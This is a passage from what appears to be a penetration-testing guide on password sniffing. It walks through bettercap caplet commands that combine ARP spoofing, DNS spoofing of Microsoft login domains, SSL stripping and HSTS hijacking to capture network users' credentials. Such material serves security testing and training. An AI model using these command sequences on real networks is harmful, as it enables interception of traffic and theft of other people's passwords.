Password sniffers

Password sniffers are a set of tools/scripts that typically perform man-in-the-middle attacks through discovery, spoofing, traffic sniffing, and proxying. From our previous experience, we noted that most organizations do not utilize SSL internally; Wireshark revealed multiple usernames and passwords.

In this section, we will use bettercap to intercept SSL traffic on the network so that we can capture the credentials of network users. bettercap is similar to the previous-generation ettercap command, with the additional capability to perform network-level spoofing and sniffing. It can be installed on Kali Linux by running apt-get install bettercap from the Terminal. bettercap underwent a lot of development in 2018 to make it compatible with a user interface and to enable the use of caplets. Caplets are just .cap files that can be scripted to achieve an objective in interactive sessions, similar to Metasploit's .rc files; they can be updated with a simple command in the Terminal: sudo bettercap -eval "caplets.update; q".

This tool can be utilized for more effective man-in-the-middle attacks on a given internal network. In this example, we will utilize one caplet with the following script to capture passwords with an ARP and DNS spoof:

» net.sniff on
» set http.proxy.sslstrip true
» http.proxy on
» set dns.spoof.domains www.office.com,login.microsoftonline.com,testfire.net
» set dns.spoof.all true
» dns.spoof on
» arp.spoof on

bettercap should now be able to sniff all the traffic on the target network without any problem, as the following screenshot showcases:

To strip SSL traffic, we can utilize the https.proxy module, as follows:

» net.sniff on
» set https.proxy.sslstrip true
» https.proxy on
» arp.spoof on
» hstshijack/hstshijack

The preceding commands in bettercap should enable attackers to see HTTPS traffic, as shown in the following screenshot:

Penetration testers should be careful when using bettercap, as this will pause the entire network that your Kali Linux machine is connected to.
